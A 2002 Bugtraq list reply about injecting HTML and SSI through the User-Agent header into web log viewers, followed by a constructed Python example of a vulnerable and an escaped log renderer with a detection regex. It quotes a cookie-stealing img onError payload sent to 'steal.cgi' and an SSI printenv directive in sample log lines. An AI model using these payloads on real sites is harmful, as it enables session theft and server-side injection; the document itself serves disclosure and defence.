From: zeno (bugtraqcgisecurity.net)
Date: Sat May 25 2002 - 15:21:50 CDT


    > normally it would contain something like... Mozilla/4.0 (compatible; MSIE
    > 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
    > ..
    >
    > but with a proxy prog (i use proxomitron) you can change it to whatever you
    > like..
    >
    > for example: <img src="x.jpg"
    > onError="this.src='steal.cgi?'+document.cookie;">
    >
    > and if the site logs it, you just got the administrators password:)
    >
    > Now, I'm yet to come across any sites that this works on because I just
    > thought of it this afternoon, but let me know if it works:) In any case, a
    > lot of sites would log/store this kind of information so it should be fixed.
    >

    Analog and W3perl both had a hole of this kind. I'm sure
    other software does.

    I have personally found an example of SSI tag insertion using this method
    on one website running an unknown product. I inserted an SSI tag into the
    User-Agent field and visited the site, which displayed the logs in an SSI
    page. It executed the SSI tag I inserted.

    I just wrote a paper on cookie theft with XSS
    that may be worth a peek.

    www.cgisecurity.com/articles/xss-faq.shtml

    Also see
    http://www.cgisecurity.net/papers/header-based-exploitation.txt

    - zenocgisecurity.com

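The bug the thread describes, as an added worked example (this is not code from the thread, nor from Analog or W3perl): a log viewer that copies the logged User-Agent straight into its HTML report, next to a version that escapes it, plus a check that flags User-Agent values carrying HTML or SSI directives. The log lines, IP addresses, timestamps and the `steal.cgi` URL are constructed for the example.

```python
"""Log-file XSS via the User-Agent header: vulnerable vs. hardened log viewer.

Constructed example, not code from the original thread or from any log
analyser. Parses Apache "combined"-format lines, renders them two ways, and
flags entries whose User-Agent looks like injected markup.
"""
import html
import re

# Apache combined log format. The quoted referer and user-agent fields are
# supplied by the client and may contain any characters except a raw '"'.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: a normal browser, a client whose User-Agent carries
# a cookie-stealing <img> payload, and one carrying an SSI directive.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/May/2002:15:21:50 -0500] "GET /index.html HTTP/1.0" 200 1234 '
    '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)"',
    '10.0.0.9 - - [25/May/2002:15:22:01 -0500] "GET /index.html HTTP/1.0" 200 1234 '
    '"-" "<img src=x.jpg onerror=this.src=\'steal.cgi?c=\'+document.cookie>"',
    '10.0.0.9 - - [25/May/2002:15:22:07 -0500] "GET /index.html HTTP/1.0" 200 1234 '
    '"-" "<!--#printenv -->"',
]


def parse_combined(line):
    """Split one combined-format line into its fields; raise on malformed input."""
    m = COMBINED_RE.match(line)
    if not m:
        raise ValueError("not a combined-format log line: %r" % line)
    return m.groupdict()


def render_vulnerable(entries):
    """The bug: attacker-controlled fields are written into the page verbatim.

    Whoever opens this report (typically the admin) runs the injected markup
    in the context of the site serving the report, so document.cookie leaks.
    """
    rows = ["<tr><td>%s</td><td>%s</td></tr>" % (e["ip"], e["ua"]) for e in entries]
    return "<table>" + "".join(rows) + "</table>"


def render_hardened(entries):
    """The fix: HTML-escape every logged field before it reaches the page."""
    rows = [
        "<tr><td>%s</td><td>%s</td></tr>"
        % (html.escape(e["ip"], quote=True), html.escape(e["ua"], quote=True))
        for e in entries
    ]
    return "<table>" + "".join(rows) + "</table>"


# Markup that has no business in a User-Agent string: tag openers, inline
# event handlers, and SSI directives (which would run if the report is a
# server-parsed page, as in the SSI case described in the thread).
SUSPICIOUS_UA = re.compile(
    r"<\s*/?\s*(?:script|img|iframe|svg|body|object|embed)\b|\bon[a-z]+\s*=|<!--#",
    re.IGNORECASE,
)


def flag_suspicious(entries):
    """Return (ip, user-agent) pairs whose User-Agent contains injected markup."""
    return [(e["ip"], e["ua"]) for e in entries if SUSPICIOUS_UA.search(e["ua"])]


def run_sample():
    """Parse the constructed log and return both renderings plus the flags."""
    entries = [parse_combined(line) for line in SAMPLE_LOG]
    return {
        "vulnerable": render_vulnerable(entries),
        "hardened": render_hardened(entries),
        "flagged": flag_suspicious(entries),
    }


if __name__ == "__main__":
    result = run_sample()
    print("vulnerable report contains raw <img>:", "<img" in result["vulnerable"])
    print("hardened report contains raw <img>:", "<img" in result["hardened"])
    for ip, ua in result["flagged"]:
        print("suspicious User-Agent from", ip, ":", ua)
```

The escaping in `render_hardened` is the whole fix; the `flag_suspicious` check is only a triage aid for spotting which clients are already probing for this and should not be relied on as a filter, since it cannot enumerate every way of smuggling markup through a header.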